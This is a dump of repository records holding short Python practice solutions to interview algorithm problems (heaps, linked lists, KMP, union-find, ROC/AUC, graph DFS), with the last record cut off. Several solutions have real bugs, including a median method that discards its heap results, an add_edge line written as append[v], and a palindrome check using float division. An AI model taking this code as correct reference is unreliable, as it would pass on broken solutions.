"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/13 下午4:07\n# @Author : Meng Xiao\nclass Solution:\n def __init__(self):\n self.left = []\n self.right = []\n self.count = 0\n\n def Insert(self, num):\n if self.count & 1 == 0:\n self.left.append(num)\n else:\n self.right.append(num)\n self.count += 1\n\n def getMedian(self,x ):\n if self.count == 1:\n return self.left[0]\n self.MaxHeap(self.left)\n self.MinHeap(self.right)\n if self.left[0] > self.right[0]:\n self.left[0], self.right[0] = self.right[0], self.left[0]\n self.MaxHeap(self.left)\n self.MinHeap(self.right)\n if self.count & 1 == 0:\n return (self.left[0] + self.right[0]) / 2.0\n else:\n return self.left[0]\n\n def MaxHeap(self, alist):\n import heapq\n max_heap = []\n for i in alist:\n heapq.heappush(max_heap, -i)\n return [-heapq.heappop(max_heap) for i in range(len(alist))]\n\n def MinHeap(self, alist):\n import heapq\n max_heap = []\n for i in alist:\n heapq.heappush(max_heap, i)\n return [heapq.heappop(max_heap) for i in range(len(alist))]\n"
},
{
"alpha_fraction": 0.5372340679168701,
"alphanum_fraction": 0.5957446694374084,
"avg_line_length": 30.16666603088379,
"blob_id": "a22f83fb18d619b51f6aea4a0a29784b41d8b3db",
"content_id": "fa5630a66831e62baa560d6ffa8427afa81d6dd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 6,
"path": "/调整数组顺序使奇数位于偶数前面.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/1 下午9:15\n# @Author : Meng Xiao\nclass Solution:\n def reOrderArray(self, array):\n return sorted(array, key=lambda c:c%2, reverse= True )\n\n"
},
{
"alpha_fraction": 0.4804270565509796,
"alphanum_fraction": 0.49347567558288574,
"avg_line_length": 21.756755828857422,
"blob_id": "8d4b86b977b10e95a4946ccc363e8cafc53047d8",
"content_id": "5c461f8aac7f3ce4b9721773293225ec109637ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 847,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 37,
"path": "/二叉搜索树与双向链表.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/11 下午7:44\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def Convert(self, pRoot):\n if not pRoot:\n return None\n if not pRoot.left and pRoot.right:\n return pRoot\n\n self.Convert(pRoot.left)\n left = pRoot.left\n\n if left:\n while left.right:\n left = left.right\n pRoot.left = left\n left.right = pRoot\n\n self.Convert(pRoot.right)\n right = pRoot.right\n\n if right:\n while right.left:\n right = right.left\n pRoot.right = right\n right.left = pRoot\n\n while pRoot.left:\n pRoot = pRoot.left\n\n return pRoot\n\n"
},
{
"alpha_fraction": 0.49658703804016113,
"alphanum_fraction": 0.5375426411628723,
"avg_line_length": 25.68181800842285,
"blob_id": "5bbd08de90e1387da59c388c831020267100f774",
"content_id": "cd2290355857f1739f06d1fed5ee1c36e037e75f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 22,
"path": "/合并两个排序链表.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/4 下午4:16\n# @Author : Meng Xiao\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def Merge(self, pHead1, pHead2):\n if pHead1 == None:\n return pHead2\n if pHead2 == None:\n return pHead1\n\n if pHead1.val < pHead2.val:\n pMergeHead = pHead1\n pMergeHead.next = self.Merge(pHead1.next, pHead2)\n else:\n pMergeHead = pHead2\n pMergeHead.next = self.Merge(pHead1, pHead2.next)\n return pMergeHead"
},
{
"alpha_fraction": 0.3879472613334656,
"alphanum_fraction": 0.41807910799980164,
"avg_line_length": 26.894737243652344,
"blob_id": "cc74e008c2b139e0fd0490ebc21b528c816b36a5",
"content_id": "2a962fb1a40fedac68b0bd1797ea449820b92baa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 535,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 19,
"path": "/和为s的连续正数序列.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午7:41\n# @Author : Meng Xiao\nclass Solution:\n def FindContinuousSequence(self, tsum):\n # write code here\n small, big = 1, 2\n res = []\n csum = small + big\n while small < big:\n if csum > tsum:\n csum -= small\n small += 1\n else:\n if csum == tsum:\n res.append([i for i in range(small, big+1)])\n big += 1\n csum += big\n return res\n\n"
},
{
"alpha_fraction": 0.546786904335022,
"alphanum_fraction": 0.5749717950820923,
"avg_line_length": 23,
"blob_id": "98aed12c55aaff46a7d680ca83b98cca4bb331e7",
"content_id": "2a72382ab39b51ebef0a6da184b8ae2b5645edfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1089,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 37,
"path": "/AUC&ROC.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/9/7 14:43\n# @Author : Meng Xiao\n'''\n得到结果数据,数据结构为:输出概率(pctr),标签真值(click)\n对结果数据按输出概率(pctr)进行从大到小排序\n从大到小,把每一个输出概率作为分类阈值,统计该分类阈值下的TPR和FPR\n微元法计算ROC曲线面积、绘制ROC曲线\n'''\nfrom matplotlib import pyplot as plt\ndef get_roc(data, pos, neg):\n data.sort(key=lambda x: x[0], reverse=True)\n roc_arr = []\n tp = fp = 0\n for sample in data:\n tp += (1 if sample[1] == 1 else 0)\n fp += (1 if sample[1] == -1 else 0)\n roc_arr.append((fp/neg, tp/pos))\n return roc_arr\n\ndef draw_roc(roc_arr):\n x = [sample[0] for sample in roc_arr]\n y = [sample[1] for sample in roc_arr]\n plt.title('ROC_curve')\n plt.xlabel('FPR')\n plt.ylabel('TPR')\n plt.plot(x, y)\n plt.show()\n\ndef get_auc(roc_arr):\n # 用微元法计算曲线下面积\n auc = 0.\n prev_x = 0\n for x, y in roc_arr:\n auc += (x-prev_x) * y\n prev_x = x\n return auc"
},
{
"alpha_fraction": 0.49763593077659607,
"alphanum_fraction": 0.5271867513656616,
"avg_line_length": 23.200000762939453,
"blob_id": "9e3e1b80487ec9c4f15ae943f132771ce5b6e1eb",
"content_id": "547c1eefde2ff31d99896c157a288284c28cc782",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 846,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 35,
"path": "/蓄水池采样.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/22 19:43\n# @Author : Meng Xiao\nimport random\nclass ReservoirSample:\n def __init__(self, size):\n self._size = size\n self._counter = 0\n self._sample = []\n\n def feed(self, item):\n self._counter += 1\n # i <= k\n if len(self._sample) < self._size:\n self._sample.append(item)\n return self._sample\n # i > k\n rand_int = random.randint(1, self._counter)\n if rand_int <= self._size:\n self._sample[rand_int-1] = item\n return self._sample\n\n\nfrom collections import Counter\n\ndef test_():\n samples = []\n for i in range(10000):\n rs = ReservoirSample(3)\n for item in range(1, 11):\n sample = rs.feed(item)\n samples.extend(sample)\n r = Counter(samples)\n print(r)\ntest_()"
},
{
"alpha_fraction": 0.48653197288513184,
"alphanum_fraction": 0.5,
"avg_line_length": 28.725000381469727,
"blob_id": "1532bb2755e41a2c43dacb8fe1f9e9267a75da2b",
"content_id": "ecc2529abd8aff530c2f9e908a9e7a3a4e0deaa8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1188,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 40,
"path": "/leetcode-547朋友圈.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/30 17:01\n# @Author : Meng Xiao\nclass UnionFind:\n def __init__(self, n):\n self.count = n\n self.parent = [i for i in range(n)]\n self.rank = [1 for i in range(n)]\n def get_count(self):\n return self.count\n\n def find_(self, p):\n while p != self.parent[p]:\n self.parent[p] = self.parent[self.parent[p]]\n p = self.parent[p]\n return p\n def is_connected(self, p, q):\n return self.find_(p) == self.find_(q)\n def union(self, p, q):\n p_root = self.find_(p)\n q_root = self.find_(q)\n if p_root == q_root:\n return\n if self.rank[p_root] > self.rank[q_root]:\n self.parent[q_root] = p_root\n elif self.rank[p_root] < self.rank[q_root]:\n self.parent[p_root] = q_root\n else:\n self.parent[q_root] = p_root\n self.rank[p_root] += 1\n self.count -= 1\n\ndef findCircleNum(M):\n n = len(M)\n union_find_set = UnionFind(n)\n for i in range(n):\n for j in range(i):\n if M[i][j] == 1:\n union_find_set.union(j, i)\n return union_find_set.get_count()"
},
{
"alpha_fraction": 0.5144278407096863,
"alphanum_fraction": 0.5253731608390808,
"avg_line_length": 26.189189910888672,
"blob_id": "c3991ea788cf64af6c712d3af8fa5924560e5527",
"content_id": "7cd8554586dfc61b682420f47d9190deee68fff4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1009,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 37,
"path": "/复杂链表的复制.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/11 下午4:21\n# @Author : Meng Xiao\nclass RandomListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n self.random = None\nclass Solution:\n def Clone(self, pHead):\n if not pHead:\n return None\n pNode = pHead\n while pNode:\n pClone = RandomListNode(pNode.val)\n pClone.next = pNode.next\n pNode.next = pClone\n pNode = pClone.next\n\n pNode = pHead\n while pNode:\n pClone = pNode.next\n if pNode.random != None:\n pClone.random = pNode.random.next\n pNode = pClone.next\n\n pNode = pHead\n pCloneHead = pCloneNode = pNode.next\n pNode.next = pCloneHead.next\n pNode = pNode.next\n\n while pNode:\n pCloneNode.next = pNode.next\n pCloneNode = pCloneNode.next\n pNode.next = pCloneNode.next\n pNode = pNode.next\n return pCloneHead"
},
{
"alpha_fraction": 0.4800758957862854,
"alphanum_fraction": 0.5161290168762207,
"avg_line_length": 32,
"blob_id": "9bea7532ad632385344e3794b1987c5130ac5690",
"content_id": "70ff7f8ee671b960cb1c5cb2adb2b5cf8eebade2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 531,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 16,
"path": "/把数组排成最小的数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/15 下午5:13\n# @Author : Meng Xiao\nclass Solution:\n def printminnumber(self, numbers):\n if not numbers:\n return ''\n str_num = [str(m) for m in numbers]\n for i in range(len(numbers)-1):\n for j in range(i+1, len(numbers)):\n if str_num[i] + str_num[j] > str_num[j] + str_num[i]:\n str_num[i], str_num[j] = str_num[j], str_num[i]\n\n return ''.join(str_num)\ns = Solution()\nprint(s.printminnumber([3,32,321]))"
},
{
"alpha_fraction": 0.420470267534256,
"alphanum_fraction": 0.466113418340683,
"avg_line_length": 20.294116973876953,
"blob_id": "17b813d19d3ade1fd44fc055815c803872ea4007",
"content_id": "26579ae2efcf5abf58121e7c5d4e25ac9388d84f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 861,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 34,
"path": "/约瑟夫环.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/19 下午9:18\n# @Author : Meng Xiao\n\ndef josephus(n, m):\n \"\"\"\n 环的问题,\n 共有n个人围成一圈,从1开始报数,数到m时退出,再从1开始,直到所有人退出\n \"\"\"\n people = list(range(1, n+1))\n index = 0\n # 给n个人编号放到people列表中,1号的下标为0\n for i in range(n):\n count = 0\n while count < m:\n if people[index] != 0:\n count += 1\n if count == m:\n print(people[index],'out!')\n #把退出的人编号置0\n people[index] = 0\n index = (index + 1) % n\n return\n\n\n\n# 递推公式法 f(n,m) = (f(n-1,m) + m) % n\ndef josephus1(n, m):\n index = 1\n for i in range(2, n+1):\n index = (index+m) % i\n return index\n\nprint(josephus1(10,6))"
},
{
"alpha_fraction": 0.4150943458080292,
"alphanum_fraction": 0.4375561475753784,
"avg_line_length": 26.121952056884766,
"blob_id": "9925f5f384597fa05e9f1bf6315f53ff4e639fa7",
"content_id": "ab63fde65092d049b8c34713cbe1275ca949ef14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1129,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 41,
"path": "/数组中的逆序队.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/16 下午4:44\n# @Author : Meng Xiao\ncount = 0\nclass Solution:\n def InversePairs(self, data):\n count = 0\n for item in (sorted(data)):\n count += data.index(item)\n data.remove(item)\n return count\n\n # 归并排序思想\n def InversePairs1(self, data):\n global count\n def MergeSort(lists):\n global count\n if len(lists) <= 1:\n return lists\n num = len(lists) // 2\n left = MergeSort(lists[:num])\n right = MergeSort(lists[num:])\n i, j = 0, 0\n result = []\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n result.append(left[i])\n i += 1\n else:\n result.append(right[j])\n j += 1\n count += len(left) - i\n\n result += right[j:]\n result += left[i:]\n return result\n MergeSort(data)\n return count\n\ns = Solution()\nprint(s.InversePairs1([7,5,6,4]))\n\n"
},
{
"alpha_fraction": 0.4989224076271057,
"alphanum_fraction": 0.5323275923728943,
"avg_line_length": 29.899999618530273,
"blob_id": "db375df8cade007ca8dec34b95c4167df65cee98",
"content_id": "1a4a55a45580df5f5c7a120284dd26eb05ddf0d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 932,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 30,
"path": "/打印从1到n最大的n位数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/30 下午4:22\n# @Author : Meng Xiao\nclass Solution:\n def PrintNumber(self, number):\n isBeginning0 = True\n nLength = len(number)\n\n for i in range(nLength):\n if isBeginning0 and number[i] != '0':\n isBeginning0 = False\n if not isBeginning0:\n print('%c' %number[i], end='')\n print('')\n\n def Print1ToMaxOfNDigits(self, n):\n if n <= 0:\n return\n number = ['0'] * n\n for i in range(10):\n number[0] = str(i)\n self.Print1ToMaxOfNDigitsRecursively(number, n, 0)\n\n def Print1ToMaxOfNDigitsRecursively(self, number, length, index):\n if index == length - 1:\n self.PrintNumber(number)\n return\n for i in range(10):\n number[index+1] = str(i)\n self.Print1ToMaxOfNDigitsRecursively(number, length, index+1)\n\n"
},
{
"alpha_fraction": 0.42531874775886536,
"alphanum_fraction": 0.4836065471172333,
"avg_line_length": 22.89130401611328,
"blob_id": "5465a212918f90c06f29a7327c75546a30c6f52c",
"content_id": "28375a0b6ddb1236cd15d8058ea06fbf462371cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1184,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 46,
"path": "/1-n整数中1出现的次数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/14 下午9:14\n# @Author : Meng Xiao\n'''\nhttp://www.cnblogs.com/qiaojushuang/p/7780445.html\n'''\nclass Solution:\n def get_digits(self, n):\n # 求整数n的位数\n ret = 0\n while n:\n ret += 1\n n //= 10\n return ret\n\n def get1digits(self, n):\n # 获取每个位数之间1的总数,n位位数,n=2即10-99\n if n < 0:\n return 0\n if n == 1:\n return 1\n current = 9 * self.get1digits(n-1) + 10 ** (n-1)\n return self.get1digits(n-1) + current\n\n def get1nums(self, n):\n if n < 10:\n return 1 if n >= 1 else 0\n digit = self.get_digits(n) # 获得位数\n low_nums = self.get1digits(digit-1) #最高位之前的1的个数\n high = int(str(n)[0]) #最高位\n low = n - high * 10 ** (digit-1) # 低位\n\n if high == 1:\n high_nums = low + 1\n all_nums = high_nums\n else:\n high_nums = 10 ** (digit-1)\n all_nums = high_nums + low_nums * (high-1)\n return low_nums + all_nums + self.get1nums(low)\n\n\n\n\n\ns = Solution()\nprint(s.get1nums(12))"
},
{
"alpha_fraction": 0.2922990322113037,
"alphanum_fraction": 0.31422147154808044,
"avg_line_length": 23.356164932250977,
"blob_id": "0d35f0e8e0dd06251c4bc206e125d70de4978503",
"content_id": "674d83dc212a168282cda5fe3ce00c3264b05fe7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1873,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 73,
"path": "/字符串匹配(KMP).py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/7/9 20:41\n# @Author : Meng Xiao\n\nclass Solution:\n def violent_match(self, s, p):\n #暴力匹配法\n sLen = len(s)\n pLen = len(p)\n i = 0\n j = 0\n while i < sLen and j < pLen:\n if s[i] == p[j]:\n i += 1\n j += 1\n\n else:\n i = i - j + 1 # i-(j-1)\n j = 0\n if j == pLen:\n return i - j\n else:\n return -1\n\n def kmp_match(self, s, p):\n i, j = 0, 0\n sLen, pLen = len(s), len(p)\n next = self.get_next_p(p)\n print(next)\n while i < sLen and j < pLen:\n if j == -1 or s[i] == p[j]:\n i += 1\n j += 1\n else:\n j = next[j]\n if j == pLen:\n return i - j\n else:\n return -1\n\n def get_next(self, p):\n # 递推方式求next数组(未优化版本)\n pLen = len(p)\n next = [-1] * pLen\n k = -1\n j = 0\n while j < pLen - 1:\n if k == -1 or p[j] == p[k]:\n k += 1\n j += 1\n next[j] = k\n else:\n k = next[k]\n return next\n def get_next_p(self, p):\n # 优化版本, 即p[j]不能等于next[j]\n pLen = len(p)\n next = [-1] * pLen\n k = -1\n j = 0\n while j < pLen - 1:\n if k == -1 or p[j] == p[k]:\n j += 1\n k += 1\n if p[j] != p[k]:\n next[j] = k\n else:\n #因为不能出现p[j] = p[next[j]],所以当出现时需要继续递归,\n # k = next[k] = next[next[k]]\n next[j] = next[k]\n else:\n k = next[k]\n return next\n\n"
},
{
"alpha_fraction": 0.3324742317199707,
"alphanum_fraction": 0.3969072103500366,
"avg_line_length": 21.882352828979492,
"blob_id": "c0ebc75eae998add9889b111dad0ce9117d303d9",
"content_id": "8706fb5c1c5582356cc68425881f1afbafd331ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/leetcode-9回文数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/5/13 20:00\n# @Author : Meng Xiao\n\nclass Solution(object):\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if x < 0 or (x != 0 and x % 10 == 0):\n return False\n rev, y = 0, x\n while x > 0:\n rev = rev * 10 + x % 10\n x /= 10\n return y == rev"
},
{
"alpha_fraction": 0.33772894740104675,
"alphanum_fraction": 0.3523809611797333,
"avg_line_length": 31.452381134033203,
"blob_id": "ee622d76dcd5cc7b3b026fa9dac6c1a903fd16b1",
"content_id": "0e16145989c44095063e7ac6fba2645bfda72db4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1565,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 42,
"path": "/表示数值的字符串.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/1 下午8:49\n# @Author : Meng Xiao\nclass Solution:\n def isNumeric(self, s):\n if len(s) <= 0:\n return False\n # 分别标记是否出现过正负号、小数点、e\n has_sign = False\n has_point = False\n has_e = False\n for i in range(len(s)):\n if s[i] == 'E' or s[i] == 'e':\n #不同时出现两个e\n if has_e:\n return False\n else:\n has_e = True\n if i == len(s) - 1: # e不能出现在最后\n return False\n elif s[i] == '+' or s[i] == '-':\n if has_sign:\n if s[i-1] != 'e' and s[i-1] != 'E':\n return False\n # 如果这是第一次出现符号位,而且出现的位置不是字符串第一个位置,那么就只能出现在e后面\n else:\n has_sign = True\n if i > 0 and s[i-1] != 'e' and s[i-1] != 'E':\n return False\n\n elif s[i] == '.':\n # 小数点不能出现两次并且如果出现过e,则不能再出现小数点\n if has_point or has_e:\n return False\n else:\n has_point = True\n if i > 0 and has_e:\n return False\n else:\n if s[i] < '0' or s[i] > '9':\n return False\n return True\n\n\n"
},
{
"alpha_fraction": 0.5047169923782349,
"alphanum_fraction": 0.5224056839942932,
"avg_line_length": 22.55555534362793,
"blob_id": "341e93db86be3adea886b83270c9e24d0121dbd2",
"content_id": "18250385b8c7f0082814c73579dfb00bd3cbbee3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 872,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 36,
"path": "/最小的k个数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/13 下午2:32\n# @Author : Meng Xiao\n'''\n快速排序取前K个\n'''\nclass Solution:\n def GetLeastNumbers_Solution(self, tinput, k):\n # write code here\n if not tinput or k > len(tinput):\n return []\n tinput = self.quick_sort(tinput)\n return tinput[:k]\n\n def quick_sort(self, lst):\n if not lst:\n return []\n pivot = lst[0]\n left = self.quick_sort([x for x in lst[1:] if x < pivot])\n right = self.quick_sort([x for x in lst[1:] if x >= pivot])\n\n return left + [pivot] + right\n\n'''\n方法2 堆\n'''\ndef getleastnums(array, k):\n import heapq\n max_heap = []\n for x in array:\n heapq.heappush(max_heap, -x)\n if len(max_heap) > k:\n heapq.heappop(max_heap)\n for x in max_heap:\n print(-x, end=' ')\n print()\n"
},
{
"alpha_fraction": 0.3468468487262726,
"alphanum_fraction": 0.38513514399528503,
"avg_line_length": 23.72222137451172,
"blob_id": "ee7981d316ed854784cae4dc70b7a77172894cba",
"content_id": "5b4bfde3dc027d0836021034bf76fc121d4dd05e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 18,
"path": "/leetcode-69 x的平方根.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/20 19:52\n# @Author : Meng Xiao\nclass Solution:\n def mySqrt(self, x):\n if x < 0:\n return\n left = 0\n right = x\n while right >= left:\n mid = (left + right) // 2\n if mid * mid > x:\n right = mid - 1\n elif mid * mid < x:\n left = mid + 1\n else:\n return mid\n return right"
},
{
"alpha_fraction": 0.41895604133605957,
"alphanum_fraction": 0.4532966911792755,
"avg_line_length": 26,
"blob_id": "ab5a90c2dbbc08f344f1cfc0dafb0ae37f0b671a",
"content_id": "4f52064407265d26af94f2c9509a8303ef292220",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 738,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 27,
"path": "/乱序数组排序后相邻最大差值.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/22 下午10:05\n# @Author : Meng Xiao\nclass Solution:\n def findMaxDivision(self, alist):\n if not alist:\n return\n length = len(alist)\n if length < 2:\n return 0\n maxnum = max(alist)\n minnum = min(alist)\n bucket = [0] * (maxnum-minnum+1) # 生成桶\n for i in range(length):\n bucket[alist[i]-minnum] += 1\n count = 0\n maxD = 0\n for i in range(len(bucket)):\n if bucket[i] == 0:\n count += 1\n else:\n if maxD < count:\n maxD = count\n count = 0\n return maxD + 1\ns = Solution()\nprint(s.findMaxDivision([1,1]))"
},
{
"alpha_fraction": 0.490278959274292,
"alphanum_fraction": 0.4995773434638977,
"avg_line_length": 25.863636016845703,
"blob_id": "838b32612eebf775afd4b4706a78448d4b349b37",
"content_id": "6bef86b5093307405b04cd1177cb0bf67b7a0654",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1191,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 44,
"path": "/图的遍历.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/24 下午8:37\n# @Author : Meng Xiao\nclass Graph(object):\n def __init__(self):\n self.node_neighbors = {}\n self.visited = {}\n\n def add_nodes(self, nodelist):\n for node in nodelist:\n self.add_node(node)\n\n def add_node(self, node):\n if not node in self.nodes():\n self.node_neighbors[node] = []\n\n def add_edge(self, edge):\n u, v = edge\n if v not in self.node_neighbors[u] and u not in self.node_neighbors[v]:\n self.node_neighbors[u].append[v]\n if u != v:\n self.node_neighbors[v].append(u)\n\n def nodes(self):\n return self.node_neighbors.keys()\n\n # 递归DFS\n def dfs_re(self, root=None):\n order = []\n def dfs(node):\n self.visited[node] = True\n order.append(node)\n for n in self.node_neighbors[node]:\n if not n in self.visited:\n dfs(n)\n if root:\n dfs(root)\n\n for node in self.nodes():\n if not node in self.visited:\n dfs(node)\n self.visited = {}\n print(order)\n return order\n\n"
},
{
"alpha_fraction": 0.39463600516319275,
"alphanum_fraction": 0.45019155740737915,
"avg_line_length": 21.69565200805664,
"blob_id": "8a5bb4d05da47d553497dd34f6a6c4dc1d262ff7",
"content_id": "aed9114e2557bfc622b39fee454bf99afa2598bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 568,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 23,
"path": "/最少操作.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/18 下午3:39\n# @Author : Meng Xiao\n\na = [1,2,2,2,5,7,8,8]\na.sort()\nmaxn = a[-1] #最大数\nminn = a[0] #最小数\ndict = {} # 数字对应出现的次数\nfor x in range(minn,2*maxn):\n dict[x] = 0\nfor ii in a:\n dict[ii] += 1\ncount = 0 # 记录操作次数\nfor key in dict:\n if dict[key] > 1:\n for i in range(dict[key]-1):\n for nn in dict:\n if nn > key and dict[nn] == 0:\n dict[nn] += 1\n count += (nn - key)\n break\nprint(count)\n"
},
{
"alpha_fraction": 0.49703264236450195,
"alphanum_fraction": 0.5163204669952393,
"avg_line_length": 27.125,
"blob_id": "539768a99c69bdb6e4b454a6a03a2f970abe4ee9",
"content_id": "daf521c7183a870e3e26a5712b4d9f3e7bf1b652",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 690,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 24,
"path": "/从上到下打印二叉树.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/10 下午5:16\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def PrintFromTopToBottom(self, root):\n if root is None:\n return []\n queue = [] # 临时队列\n result = [] # 结果\n\n queue.append(root)\n while(len(queue)) > 0:\n currentRoot = queue.pop(0)\n result.append(currentRoot.val)\n if currentRoot.left:\n queue.append(currentRoot.left)\n if currentRoot.right:\n queue.append(currentRoot.right)\n return result"
},
{
"alpha_fraction": 0.42994505167007446,
"alphanum_fraction": 0.4780219793319702,
"avg_line_length": 30.65217399597168,
"blob_id": "008580baddc4528fa4f0e402dff2905a0fdf511b",
"content_id": "805e58977ba3574f58169b65b371c000d40f6d50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 732,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 23,
"path": "/数组中唯一只出现一次的数字.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午7:33\n# @Author : Meng Xiao\nclass Solution:\n def findNumAppOnce(self, array):\n if not array or len(array) == 0:\n return\n max_length = max([len(bin(x))for x in array]) - 2\n bits_count = [0] * max_length\n for x in array:\n bit_mask = 1\n for bit_index in range(max_length-1, -1, -1):\n if x & bit_mask != 0:\n bits_count[bit_index] += 1\n bit_mask = bit_mask << 1\n\n result = 0\n for count in bits_count:\n result = result << 1\n result += count % 3\n return result\ns = Solution()\nprint(s.findNumAppOnce([2, 18, 3, 7, 3, 3, 2, 7, 2, 7]))\n"
},
{
"alpha_fraction": 0.31851252913475037,
"alphanum_fraction": 0.3427647650241852,
"avg_line_length": 26.808988571166992,
"blob_id": "ac0ee2efe93f4a21faf46357b82f2ab5a4b4a34e",
